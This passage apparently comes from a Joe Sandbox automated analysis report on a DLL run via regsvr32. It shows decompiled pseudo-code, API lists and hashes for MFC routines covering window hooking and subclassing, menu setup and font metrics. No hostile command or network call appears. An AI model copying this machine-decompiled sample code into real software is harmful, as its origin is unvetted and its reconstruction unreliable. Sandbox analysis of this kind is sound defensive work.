                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$H_prolog3MessageSend$ClassCopyMenuNamelstrlen$ColorCreateDeleteInsertIntersectItemOffsetPopupRelease_memset_strlen
                                                                                                                • String ID: P$ReBarWindow32$ToolbarWindow32
                                                                                                                • API String ID: 891312130-460576549
                                                                                                                • Opcode ID: a3bd144e737abe0645fe1da6afaf55057a275fc0ba90bc7761989e3142a9a979
                                                                                                                • Instruction ID: b4c68f327188d744d22f3c9931f261ee9d8a14f523f27da6a36b721c5d26d668
                                                                                                                • Opcode Fuzzy Hash: a3bd144e737abe0645fe1da6afaf55057a275fc0ba90bc7761989e3142a9a979
                                                                                                                • Instruction Fuzzy Hash: 3CF18B75900248AFDF16DFA4CC85EEE7BA8FF04341F104119F91AAB2A2DB70EA44CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1001603B(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t54;
                                                                                                                				void* _t55;
                                                                                                                				signed int _t56;
                                                                                                                				void* _t59;
                                                                                                                				long _t60;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t66;
                                                                                                                				short _t72;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t76;
                                                                                                                				long _t83;
                                                                                                                				signed int _t86;
                                                                                                                				signed short _t87;
                                                                                                                				signed int _t88;
                                                                                                                				int _t94;
                                                                                                                				void* _t106;
                                                                                                                				long* _t108;
                                                                                                                				long _t110;
                                                                                                                				signed int _t111;
                                                                                                                				CHAR* _t112;
                                                                                                                				intOrPtr _t113;
                                                                                                                				void* _t116;
                                                                                                                				void* _t119;
                                                                                                                				intOrPtr _t120;
                                                                                                                
                                                                                                                				_t119 = __eflags;
                                                                                                                				_t105 = __edi;
                                                                                                                				_push(0x148);
                                                                                                                				E100476B6(0x1008ea86, __ebx, __edi, __esi);
                                                                                                                				_t110 =  *(_t116 + 0x10);
                                                                                                                				_t94 =  *(_t116 + 0xc);
                                                                                                                				_push(0x1000a083);
                                                                                                                				 *(_t116 - 0x120) = _t110;
                                                                                                                				_t54 = E10020A61(_t94, 0x100bdc04, __edi, _t110, _t119);
                                                                                                                				_t120 = _t54;
                                                                                                                				_t97 = 0 | _t120 == 0x00000000;
                                                                                                                				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
                                                                                                                				_t121 = _t120 == 0;
                                                                                                                				if(_t120 == 0) {
                                                                                                                					_t54 = E1000A069(_t94, _t97, __edi, _t110, _t121);
                                                                                                                				}
                                                                                                                				if( *(_t116 + 8) == 3) {
                                                                                                                					_t106 =  *_t110;
                                                                                                                					_t111 =  *(_t54 + 0x14);
                                                                                                                					_t55 = E1001E302(_t94, _t106, _t111, __eflags);
                                                                                                                					__eflags = _t111;
                                                                                                                					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                                                                                					 *(_t116 - 0x124) = _t56;
                                                                                                                					if(_t111 != 0) {
                                                                                                                						L7:
                                                                                                                						__eflags =  *0x100bdecc;
                                                                                                                						if( *0x100bdecc == 0) {
                                                                                                                							L12:
                                                                                                                							__eflags = _t111;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								__eflags =  *0x100bdba4;
                                                                                                                								if( *0x100bdba4 != 0) {
                                                                                                                									L19:
                                                                                                                									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x100bdba4; // 0x0
                                                                                                                									if(__eflags != 0) {
                                                                                                                										L23:
                                                                                                                										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                                                                                										__eflags = _t59;
                                                                                                                										 *(_t116 - 0x14) = _t59;
                                                                                                                										if(_t59 != 0) {
                                                                                                                											_t112 = "AfxOldWndProc423";
                                                                                                                											_t64 = GetPropA(_t94, _t112);
                                                                                                                											__eflags = _t64;
                                                                                                                											if(_t64 == 0) {
                                                                                                                												SetPropA(_t94, _t112,  *(_t116 - 0x14));
                                                                                                                												_t66 = GetPropA(_t94, _t112);
                                                                                                                												__eflags = _t66 -  *(_t116 - 0x14);
                                                                                                                												if(_t66 ==  *(_t116 - 0x14)) {
                                                                                                                													GlobalAddAtomA(_t112);
                                                                                                                													SetWindowLongA(_t94, 0xfffffffc, E10015EF7);
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                										L27:
                                                                                                                										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
                                                                                                                										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
                                                                                                                										__eflags =  *(_t116 - 0x124);
                                                                                                                										_t110 = _t60;
                                                                                                                										if( *(_t116 - 0x124) != 0) {
                                                                                                                											UnhookWindowsHookEx( *(_t105 + 0x28));
                                                                                                                											_t50 = _t105 + 0x28;
                                                                                                                											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
                                                                                                                											__eflags =  *_t50;
                                                                                                                										}
                                                                                                                										goto L30;
                                                                                                                									}
                                                                                                                									goto L27;
                                                                                                                								}
                                                                                                                								_t113 = 0x30;
                                                                                                                								E10049170(_t106, _t116 - 0x154, 0, _t113);
                                                                                                                								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
                                                                                                                								_push(_t116 - 0x154);
                                                                                                                								_push("#32768");
                                                                                                                								_push(0);
                                                                                                                								_t72 = E100124BF(_t94, _t97, _t106, "#32768", __eflags);
                                                                                                                								__eflags = _t72;
                                                                                                                								 *0x100bdba4 = _t72;
                                                                                                                								if(_t72 == 0) {
                                                                                                                									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
                                                                                                                									__eflags = _t74;
                                                                                                                									if(_t74 == 0) {
                                                                                                                										goto L23;
                                                                                                                									}
                                                                                                                									 *((char*)(_t116 - 0x19)) = 0;
                                                                                                                									_t76 = E1004BFE6(_t116 - 0x118, "#32768");
                                                                                                                									__eflags = _t76;
                                                                                                                									if(_t76 == 0) {
                                                                                                                										goto L27;
                                                                                                                									}
                                                                                                                									goto L23;
                                                                                                                								}
                                                                                                                								goto L19;
                                                                                                                							}
                                                                                                                							E1001E397(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
                                                                                                                							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
                                                                                                                							E1001402B(_t111, _t116, _t94);
                                                                                                                							 *((intOrPtr*)( *_t111 + 0x50))();
                                                                                                                							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
                                                                                                                							_t83 = SetWindowLongA(_t94, 0xfffffffc, E100149C7);
                                                                                                                							__eflags = _t83 - E100149C7;
                                                                                                                							if(_t83 != E100149C7) {
                                                                                                                								 *_t108 = _t83;
                                                                                                                							}
                                                                                                                							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
                                                                                                                							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
                                                                                                                							__eflags =  *(_t116 - 0x14);
                                                                                                                							if( *(_t116 - 0x14) != 0) {
                                                                                                                								_push( *(_t116 - 0x18));
                                                                                                                								_push(0);
                                                                                                                								E1001D714();
                                                                                                                							}
                                                                                                                							goto L27;
                                                                                                                						}
                                                                                                                						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                                                                                						__eflags = _t86 & 0x00010000;
                                                                                                                						if((_t86 & 0x00010000) != 0) {
                                                                                                                							goto L27;
                                                                                                                						}
                                                                                                                						_t87 =  *(_t106 + 0x28);
                                                                                                                						__eflags = _t87 - 0xffff;
                                                                                                                						if(_t87 <= 0xffff) {
                                                                                                                							 *(_t116 - 0x18) = 0;
                                                                                                                							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
                                                                                                                							_t87 = _t116 - 0x18;
                                                                                                                						}
                                                                                                                						_t88 = E1001286D(_t87, "ime");
                                                                                                                						__eflags = _t88;
                                                                                                                						_pop(_t97);
                                                                                                                						if(_t88 == 0) {
                                                                                                                							goto L27;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					__eflags =  *(_t106 + 0x20) & 0x40000000;
                                                                                                                					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
                                                                                                                						goto L27;
                                                                                                                					}
                                                                                                                					__eflags = _t56;
                                                                                                                					if(_t56 != 0) {
                                                                                                                						goto L27;
                                                                                                                					}
                                                                                                                					goto L7;
                                                                                                                				} else {
                                                                                                                					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
                                                                                                                					L30:
                                                                                                                					return E10047739(_t94, _t105, _t110);
                                                                                                                				}
                                                                                                                			}



























                                                                                                                0x100160e6
                                                                                                                0x100160f3
                                                                                                                0x100160f7
                                                                                                                0x100160fd
                                                                                                                0x100160fd
                                                                                                                0x10016106
                                                                                                                0x1001610b
                                                                                                                0x1001610e
                                                                                                                0x1001610f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001610f
                                                                                                                0x100160ac
                                                                                                                0x100160b3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100160b9
                                                                                                                0x100160bb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016081
                                                                                                                0x10016089
                                                                                                                0x10016286
                                                                                                                0x1001628b
                                                                                                                0x1001628b

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10016045
                                                                                                                  • Part of subcall function 10020A61: __EH_prolog3.LIBCMT ref: 10020A68
                                                                                                                • CallNextHookEx.USER32 ref: 10016089
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • GetClassLongA.USER32(?,000000E6), ref: 100160CD
                                                                                                                • GlobalGetAtomNameA.KERNEL32 ref: 100160F7
                                                                                                                • SetWindowLongA.USER32 ref: 1001614C
                                                                                                                • _memset.LIBCMT ref: 10016196
                                                                                                                • GetClassLongA.USER32(?,000000E0), ref: 100161C6
                                                                                                                • GetClassNameA.USER32(?,?,00000100), ref: 100161E7
                                                                                                                • GetWindowLongA.USER32(?,000000FC), ref: 1001620B
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 10016225
                                                                                                                • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 10016230
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 10016238
                                                                                                                • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 10016240
                                                                                                                • SetWindowLongA.USER32 ref: 1001624E
                                                                                                                • CallNextHookEx.USER32 ref: 10016266
                                                                                                                • UnhookWindowsHookEx.USER32 ref: 1001627A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                                                • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                • API String ID: 1191297049-4034971020
                                                                                                                • Opcode ID: 4e41d8bc3767c021b246338e12286f8aa2d02b8d6f8887c17fdb326e8de98a25
                                                                                                                • Instruction ID: 4bde84d923aef39c465868793b08f59cf9dd9610db53f90e5a7fdac53ca2e90d
                                                                                                                • Opcode Fuzzy Hash: 4e41d8bc3767c021b246338e12286f8aa2d02b8d6f8887c17fdb326e8de98a25
                                                                                                                • Instruction Fuzzy Hash: 1061E035901626ABEB20DB60CD49BDE7BB8EF09365F110194F60AEB191DB34D9C4CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E10001069(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t133;
                                                                                                                				void* _t135;
                                                                                                                				void* _t136;
                                                                                                                				void* _t140;
                                                                                                                				struct HWND__** _t145;
                                                                                                                				struct HWND__** _t147;
                                                                                                                				void* _t148;
                                                                                                                				void* _t151;
                                                                                                                				signed int _t152;
                                                                                                                				void* _t154;
                                                                                                                				char* _t157;
                                                                                                                
                                                                                                                				_t154 = __eflags;
                                                                                                                				_t133 = __edx;
                                                                                                                				_t103 = __ecx;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(0x1008da6b);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t152 = _t151 - 0x14;
                                                                                                                				_push(_t135);
                                                                                                                				_t46 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_push(_t46 ^ _t152);
                                                                                                                				 *[fs:0x0] = _t152 + 0x28;
                                                                                                                				_t140 = __ecx;
                                                                                                                				E1001BAAC(__ecx, _t135);
                                                                                                                				_push(GetSystemMenu( *(_t140 + 0x20), 0));
                                                                                                                				_t136 = E1001E527(0, _t103, _t135, _t140, _t154);
                                                                                                                				if(_t136 != 0) {
                                                                                                                					L1000140B(_t152 + 0x18, E100184C0());
                                                                                                                					 *((intOrPtr*)(_t152 + 0x34)) = 0;
                                                                                                                					L10001276(_t152 + 0x18, 0x65);
                                                                                                                					if( *((intOrPtr*)( *(_t152 + 0x14) - 0xc)) != 0) {
                                                                                                                						AppendMenuA( *(_t136 + 4), 0x800, 0, 0);
                                                                                                                						AppendMenuA( *(_t136 + 4), 0, 0x10,  *(_t152 + 0x14));
                                                                                                                					}
                                                                                                                					 *(_t152 + 0x30) =  *(_t152 + 0x30) | 0xffffffff;
                                                                                                                					_t157 =  &(( *(_t152 + 0x14))[0xfffffffffffffff0]);
                                                                                                                					L100013E3( &(( *(_t152 + 0x14))[0xfffffffffffffff0]), _t133);
                                                                                                                				}
                                                                                                                				_t137 = SendMessageA;
                                                                                                                				SendMessageA( *(_t140 + 0x20), 0x80, 1,  *(_t140 + 0x358));
                                                                                                                				SendMessageA( *(_t140 + 0x20), 0x80, 0,  *(_t140 + 0x358));
                                                                                                                				E1000F61B(_t140 + 0x148, 0, 0xff);
                                                                                                                				L1000100A(0, _t140 + 0x148, _t133, SendMessageA, 0x80, _t157, 0x80);
                                                                                                                				L10001140(0, _t140 + 0x148, _t133, 0x80, E1001768F(_t140, 0x3ed));
                                                                                                                				L100011F9(0, _t140 + 0x148, SendMessageA, _t140, _t157);
                                                                                                                				SendMessageA( *(_t140 + 0x168), 0x414, 0x10, 0);
                                                                                                                				SendMessageA( *(_t140 + 0x168), 0x415, 0, 0x20);
                                                                                                                				E1000F61B(_t140 + 0x250, 0, 0xff);
                                                                                                                				L1000100A(0, _t140 + 0x250, _t133, SendMessageA, 0x80, _t157, 0x80);
                                                                                                                				L10001140(0, _t140 + 0x250, _t133, 0x80, E1001768F(_t140, 0x3ee));
                                                                                                                				L100011F9(0, _t140 + 0x250, _t137, _t140, _t157);
                                                                                                                				SendMessageA( *(_t140 + 0x270), 0x414, 0x10, 0);
                                                                                                                				SendMessageA( *(_t140 + 0x270), 0x415, 0, 0x20);
                                                                                                                				E1000F61B(_t140 + 0x2d4, 0, 0xff);
                                                                                                                				_t144 = _t140 + 0x2d4;
                                                                                                                				L1000100A(0, _t140 + 0x2d4, _t133, _t137, _t140 + 0x2d4, _t157, 0x80);
                                                                                                                				L10001140(0, _t144, _t133, _t144, E1001768F(_t140, 0x3ef));
                                                                                                                				L100011F9(0, _t144, _t137, _t140, _t157);
                                                                                                                				_t145 = _t140 + 0x2f4;
                                                                                                                				SendMessageA( *_t145, 0x414, 0x10, 0);
                                                                                                                				SendMessageA( *_t145, 0x415, 0, 0x20);
                                                                                                                				_t146 = _t140 + 0x1cc;
                                                                                                                				E1000F61B(_t140 + 0x1cc, 0, 0xf0);
                                                                                                                				L1000100A(0, _t140 + 0x1cc, _t133, _t137, _t146, _t157, 0x78);
                                                                                                                				L10001140(0, _t146, _t133, _t146, E1001768F(_t140, 0x3f0));
                                                                                                                				L100011F9(0, _t146, _t137, _t140, _t157);
                                                                                                                				_t147 = _t140 + 0x1ec;
                                                                                                                				SendMessageA( *_t147, 0x414, 0xc, 0);
                                                                                                                				SendMessageA( *_t147, 0x415, 0, 0x18);
                                                                                                                				_t148 = E1001768F(_t140, 0x3e8);
                                                                                                                				GetClientRect( *(_t148 + 0x20), _t152 + 0x18);
                                                                                                                				L100014F6(_t148, _t140, _t152 + 0x18);
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t140 + 0x7c)) + 0x54))(0, "Spectrum", 0x50000000, _t152 + 0x24, _t140, 0x1245, 0, 0xc0c0c0, 0, 0xe35b5b, 0, 0x5be35b, 0, 0x5b5be3, 0);
                                                                                                                				SendMessageA( *(_t148 + 0x20), 0x10, 0, 0);
                                                                                                                				PostMessageA( *(_t140 + 0x20), 0x115, 0,  *(_t140 + 0x168));
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t152 + 0x28));
                                                                                                                				return 1;
                                                                                                                			}



















                                                                                                                0x100087bb
                                                                                                                0x100087c8
                                                                                                                0x100087d7

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$Menu$Append$ClientPostRectSystem
                                                                                                                • String ID: Spectrum
                                                                                                                • API String ID: 2066304807-103510960
                                                                                                                • Opcode ID: b5cc9c2296e574058509840be55fbeef93d50fa0541e700fa9086c0337b757a2
                                                                                                                • Instruction ID: e2de74c3c2d5a4a58301f47727eb28d82eb25700d7cd5afd40f373a8dffbfa27
                                                                                                                • Opcode Fuzzy Hash: b5cc9c2296e574058509840be55fbeef93d50fa0541e700fa9086c0337b757a2
                                                                                                                • Instruction Fuzzy Hash: 44718F75240B48BFE625EB20CC86FEF77ADFF84784F000928B25A561E2DA71BD448B14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E1002A272(void* __ecx, void* __eflags, intOrPtr _a4, signed short _a8, int _a12, int _a16, intOrPtr* _a20) {
                                                                                                                				signed int _v8;
                                                                                                                				struct tagLOGFONTA _v68;
                                                                                                                				struct HDC__* _v72;
                                                                                                                				int _v76;
                                                                                                                				void* _v80;
                                                                                                                				void* _v84;
                                                                                                                				intOrPtr* _v88;
                                                                                                                				struct tagSIZE _v96;
                                                                                                                				struct tagTEXTMETRICA _v152;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t41;
                                                                                                                				int _t46;
                                                                                                                				void* _t54;
                                                                                                                				signed int _t69;
                                                                                                                				int _t76;
                                                                                                                				void* _t77;
                                                                                                                				signed int _t81;
                                                                                                                				signed int _t82;
                                                                                                                				void* _t83;
                                                                                                                				intOrPtr* _t85;
                                                                                                                				signed int _t87;
                                                                                                                
                                                                                                                				_t77 = __ecx;
                                                                                                                				_t41 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t41 ^ _t87;
                                                                                                                				_t85 = _a20;
                                                                                                                				_v88 = _t85;
                                                                                                                				_v72 = GetDC(0);
                                                                                                                				E10049170(_t83,  &_v68, 0, 0x3c);
                                                                                                                				_t46 = GetDeviceCaps(_v72, 0x5a);
                                                                                                                				_t84 = MulDiv;
                                                                                                                				_v68.lfHeight =  ~(MulDiv(_a8 & 0x0000ffff, _t46, 0x48));
                                                                                                                				_v68.lfWeight = 0x190;
                                                                                                                				_v68.lfCharSet = 1;
                                                                                                                				_push(L10048E92( &(_v68.lfFaceName), 0x20, _a4, 0xffffffff));
                                                                                                                				L1000135C(_a4, _t77, MulDiv, _t85);
                                                                                                                				_t54 = CreateFontIndirectA( &_v68);
                                                                                                                				_v80 = _t54;
                                                                                                                				if(_t54 == 0) {
                                                                                                                					_v76 = GetDialogBaseUnits() & 0x0000ffff;
                                                                                                                					_t76 = GetDialogBaseUnits() >> 0x10;
                                                                                                                				} else {
                                                                                                                					_v84 = SelectObject(_v72, _t54);
                                                                                                                					GetTextMetricsA(_v72,  &_v152);
                                                                                                                					_t76 = _v152.tmExternalLeading + _v152.tmHeight;
                                                                                                                					GetTextExtentPoint32A(_v72, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", 0x34,  &_v96);
                                                                                                                					_t69 = _v96.cx + 0x1a;
                                                                                                                					_t81 = 0x34;
                                                                                                                					asm("cdq");
                                                                                                                					_t82 = _t69 % _t81;
                                                                                                                					_v76 = _t69 / _t81;
                                                                                                                					SelectObject(_v72, _v84);
                                                                                                                					DeleteObject(_v80);
                                                                                                                					_t85 = _v88;
                                                                                                                				}
                                                                                                                				ReleaseDC(0, _v72);
                                                                                                                				 *_t85 = MulDiv(_a12, _v76, 4);
                                                                                                                				 *((intOrPtr*)(_t85 + 4)) = MulDiv(_a16, _t76, 8);
                                                                                                                				return E1004763E(_t60, _t76, _v8 ^ _t87, _t82, _t84, _t85);
                                                                                                                			}




























                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 1002A293
                                                                                                                • _memset.LIBCMT ref: 1002A2A4
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 1002A2B3
                                                                                                                • MulDiv.KERNEL32 ref: 1002A2C5
                                                                                                                • _wctomb_s.LIBCMT ref: 1002A2E0
                                                                                                                  • Part of subcall function 10048E92: __mbsnbcpy_s_l.LIBCMT ref: 10048EA4
                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 1002A2F2
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1002A309
                                                                                                                • GetTextMetricsA.GDI32(?,?), ref: 1002A318
                                                                                                                • GetTextExtentPoint32A.GDI32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 1002A33B
                                                                                                                • SelectObject.GDI32(?,?), ref: 1002A356
                                                                                                                • DeleteObject.GDI32(?), ref: 1002A35B
                                                                                                                • GetDialogBaseUnits.USER32 ref: 1002A36C
                                                                                                                • GetDialogBaseUnits.USER32 ref: 1002A374
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 1002A380
                                                                                                                • MulDiv.KERNEL32 ref: 1002A38E
                                                                                                                • MulDiv.KERNEL32 ref: 1002A398
                                                                                                                Strings
                                                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 1002A333
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$BaseDialogSelectTextUnits$CapsCreateDeleteDeviceExtentFontIndirectMetricsPoint32Release__mbsnbcpy_s_l_memset_wctomb_s
                                                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                                • API String ID: 332251102-222967699
                                                                                                                • Opcode ID: 384aeabfd8e3c82378f84a014e930b819d84851ea08dbeaf13ef1bf8bab1445e
                                                                                                                • Instruction ID: b41e73f3cd40d0cf8ebef9bcd289606718180d74c28e02b965907366521e4e5e
                                                                                                                • Opcode Fuzzy Hash: 384aeabfd8e3c82378f84a014e930b819d84851ea08dbeaf13ef1bf8bab1445e
                                                                                                                • Instruction Fuzzy Hash: 334127B1D00218AFEF10DFE4CD89ADEBBB9FF09700F104056F606A62A1DB75AA11CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 46%
                                                                                                                			E1003B427(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t190;
                                                                                                                				intOrPtr* _t200;
                                                                                                                				signed int _t203;
                                                                                                                				signed int _t206;
                                                                                                                				intOrPtr* _t208;
                                                                                                                				intOrPtr _t211;
                                                                                                                				char _t230;
                                                                                                                				CHAR* _t236;
                                                                                                                				intOrPtr _t237;
                                                                                                                				signed short _t240;
                                                                                                                				signed int _t241;
                                                                                                                				signed int _t242;
                                                                                                                				signed int _t250;
                                                                                                                				signed int* _t257;
                                                                                                                				signed int _t258;
                                                                                                                				signed int _t277;
                                                                                                                				signed short* _t278;
                                                                                                                				signed short* _t279;
                                                                                                                				signed int _t290;
                                                                                                                				intOrPtr* _t293;
                                                                                                                				CHAR* _t295;
                                                                                                                				intOrPtr* _t296;
                                                                                                                				intOrPtr _t297;
                                                                                                                				signed int** _t299;
                                                                                                                				void* _t300;
                                                                                                                				void* _t301;
                                                                                                                				void* _t302;
                                                                                                                				void* _t313;
                                                                                                                
                                                                                                                				_push(0x7c);
                                                                                                                				_t190 = E1004764D(0x100910c1, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
                                                                                                                				_t257 = 0;
                                                                                                                				if( *((intOrPtr*)(__ecx)) == 0) {
                                                                                                                					L78:
                                                                                                                					return E10047725(_t190);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t300 - 0x54)) = 0;
                                                                                                                				 *((intOrPtr*)(_t300 - 0x50)) = 0;
                                                                                                                				 *(_t300 - 0x4c) = 0;
                                                                                                                				 *((intOrPtr*)(_t300 - 0x48)) = 0;
                                                                                                                				 *(_t300 - 4) = 0;
                                                                                                                				E10049170(__edi, _t300 - 0x54, 0, 0x10);
                                                                                                                				_t302 = _t301 + 0xc;
                                                                                                                				if( *(_t300 + 0x18) != 0) {
                                                                                                                					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
                                                                                                                				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
                                                                                                                					 *((intOrPtr*)(_t300 - 0x48)) = 1;
                                                                                                                					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t300 - 0x68)) = 0x1009ee28;
                                                                                                                				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
                                                                                                                				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
                                                                                                                				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
                                                                                                                				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
                                                                                                                				_t194 =  *(_t300 - 0x4c);
                                                                                                                				_t308 =  *(_t300 - 0x4c) - _t257;
                                                                                                                				 *(_t300 - 4) = 1;
                                                                                                                				_t293 = 4;
                                                                                                                				if( *(_t300 - 0x4c) == _t257) {
                                                                                                                					L37:
                                                                                                                					_t295 = 0;
                                                                                                                					E100235FF(_t300 - 0x44);
                                                                                                                					if( *(_t300 + 0x10) != _t257) {
                                                                                                                						_t295 = _t300 - 0x44;
                                                                                                                					}
                                                                                                                					E10049170(_t293, _t300 - 0x88, _t257, 0x20);
                                                                                                                					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
                                                                                                                					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
